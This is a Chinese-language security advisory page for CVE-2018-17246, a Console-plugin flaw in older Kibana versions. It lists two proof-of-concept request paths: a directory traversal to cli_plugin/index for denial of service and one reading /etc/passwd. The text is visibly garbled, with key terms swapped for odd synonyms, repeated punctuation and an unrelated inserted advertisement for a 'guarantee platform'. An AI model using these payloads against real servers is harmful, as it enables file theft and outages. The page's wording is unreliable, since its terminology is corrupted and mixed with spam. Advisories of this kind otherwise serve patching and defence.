首页 > 清静研究 > 清静转达 > 清静通告

宣布时间 2018-12-20

CVE编号：CVE-2018-17246，，，危险级别：中危，，，CVSS分值：厂商自评 6.3，，，官方未评定

ElasticSearch Kibana <6.4.3

ElasticSearch Kibana <5.6.13

Elasticsearch Kibana（前称elasticsearch-dashboard）是荷兰Elasticsearch公司的一套开源的、基于浏览器的剖析和搜索Elasticsearch仪表板工具。。。。。。Console是其中的一个控制台插件。。。。。。

Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console插件保存清静误差。。。。。。攻击者可通过发送请求使用该误差在主机操作系统上以Kibana历程权限执行恣意下令。。。。。。

鉴黑担保网(jhdbw)·最具权威唯一维权担保平台

POC/EXP：

拒绝效劳，，，攻击向量如下：

/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../cli_plugin/index

恣意文件读取�。。。。。�，，攻击向量如下：

/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

现在厂商已宣布升级补丁以修复误差，，，补丁获取链接:

https://access.redhat.com/security/cve/cve-2018-17246

https://access.redhat.com/security/cve/cve-2018-17246

http://www.cnvd.org.cn/flaw/show/CNVD-2018-23907

400-624-3900

官方微信

官方微博

网御星云合众数据书生电子云子可信

执法声明